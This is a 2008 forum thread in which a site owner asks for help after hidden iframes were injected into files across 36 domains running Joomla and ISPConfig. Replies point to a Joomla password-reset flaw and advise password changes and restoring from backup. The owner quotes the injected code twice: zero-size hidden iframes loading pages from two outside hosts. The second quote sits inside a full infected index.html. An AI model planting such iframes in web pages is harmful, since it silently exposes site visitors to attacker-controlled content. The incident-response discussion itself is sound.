Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 2 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 18th August 2008, 19:58
biznes24 biznes24 is offline
Junior Member
 
Join Date: Aug 2008
Posts: 10
Thanks: 0
Thanked 1 Time in 1 Post
Default My pages was infected - PLEASE HELP!

Hi,

My side was infected by added code to end of line to all file on catalogue web.
The code what cracker put is
PHP Code:
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe
What I can do now? I have 36 domains infected. What is command to ubuntu to remove all this line code in all domains? How I can security from this next time?

rgds
Reply With Quote
Sponsored Links
  #2  
Old 18th August 2008, 20:26
Ben Ben is offline
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts
Default

Looks like you have any bad coded software, not escaping input receiving from a user. On what pages do you find that code? E.g. if this is a forum you have to look inside the databse and not in specific files.

And there won't be a "command" to erase those lines and safe your server in the future.
At first you have to analyse where those lines occur, so that you can find the weak parts in your server.
Reply With Quote
  #3  
Old 18th August 2008, 20:36
biznes24 biznes24 is offline
Junior Member
 
Join Date: Aug 2008
Posts: 10
Thanks: 0
Thanked 1 Time in 1 Post
Default

Quote:
Originally Posted by Ben View Post
Looks like you have any bad coded software, not escaping input receiving from a user. On what pages do you find that code?
I find in my joomla 1.5.6 all files. Find in page when creat new domains in ispconfig please look:
PHP Code:
<HTML>
<
HEAD>
<
TITLE>Welcome!</TITLE>
</
HEAD>
<
BODY BGCOLOR="#FFFFFF" leftMargin=0 topMargin=0 rightMargin=0 marginheight="0" marginwidth="0">
<
CENTER>
<
TABLE BORDER="0" WIDTH="100%" CELLSPACING="0">
  <
TR>
    <
TD BGCOLOR="#025CCA" ALIGN="CENTER">
    <
HR SIZE="1" COLOR="#FFFFFF">
    <
TABLE>
      <
TR>

            <
TD><FONT SIZE="3" COLOR="#FFFFFF" FACE="Helvetica, Arial"><B>Welcome
              to
              
<!--ADRESSE//-->www<!--ADRESSE//-->
              
</B></FONT></TD>
      </
TR>
    </
TABLE>
    <
HR SIZE="1" COLOR="#FFFFFF">
    </
TD>
  </
TR>
  <
TR>

    <
TD BGCOLOR="#FFFFFF">
    <
BR><BR><CENTER>
        <
FONT COLOR="#000000" SIZE="2" FACE="Helvetica, Arial">This is the standard index of your websiteYou can easily delete it or replace it with another fileThis is the index.html file
        in the 
<B>web</Bdirectory.
        <
P>For questions or problems please contact the server administrator.</FONT> </CENTER>
          <
BR>

        <
HR SIZE="1" WIDTH="90%">

      <
CENTER>
<
FONT SIZE="1" COLOR="#000000" FACE="Verdana, Arial">powered by <A HREF="http://www.ispconfig.org">ISPConfig</A></FONT>
      </
CENTER>
    </
TD>
  </
TR>
</
TABLE>
</
CENTER>
</
BODY>
</
HTML><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe
What now if I remove?. He back and infected again? Becouse he infected random domains in 14-08-2008
Reply With Quote
  #4  
Old 18th August 2008, 21:19
gdaddy gdaddy is offline
Junior Member
 
Join Date: Aug 2008
Posts: 11
Thanks: 0
Thanked 3 Times in 3 Posts
Default

You're better off to go to the Joomla security forums and join the other 100's of I've been hacked posts. If just one of your sites, even a test domain was not running Joomla 1.5.6 on the 14/8/8 then they will have got through the token length password reset vulnerability.

If your username was admin for any one of those sites that will be how they got in. They reset the password, to the 1st user, which by default is admin.

Don't feel too bad though, even Joomla.org got hit. But in essence, you are going to have to change all passwords to Joomla, Mysql and FTP at a minimum. Probably best to do users and ISP config as well.

In terms of getting rid of it, restore files from backup (big props to Joomlapack here), your content should be OK, this hack targets index.php and or template.php. Given that what you are showing is exactly like the other Joomla hacks, I doubt this is much to do with ISPConfig. Joomla forums will help you better.

Last edited by gdaddy; 18th August 2008 at 21:21. Reason: spelling
Reply With Quote
  #5  
Old 18th August 2008, 21:25
gdaddy gdaddy is offline
Junior Member
 
Join Date: Aug 2008
Posts: 11
Thanks: 0
Thanked 3 Times in 3 Posts
 
Default

Oh and I see they have got to the default ISP Config files, once again restore from backup for ISP config, but provided you make sure everything is 1.5.6 and you just restore the php files that create the standard ISPConfig pages, you should be OK.
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
One site contaminated by r57shell aceyzeriat Installation/Configuration 21 13th May 2009 12:19
Error pages and privileges erebus Feature Requests 1 6th November 2007 09:17
standard "show directory" mode and error pages testset General 7 9th April 2007 00:53
pure-ftp woes d3th_n1gG4 Server Operation 4 24th January 2007 13:11
Network questions regarding Ubuntu Server lubod Installation/Configuration 7 3rd January 2007 18:53


All times are GMT +2. The time now is 20:40.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.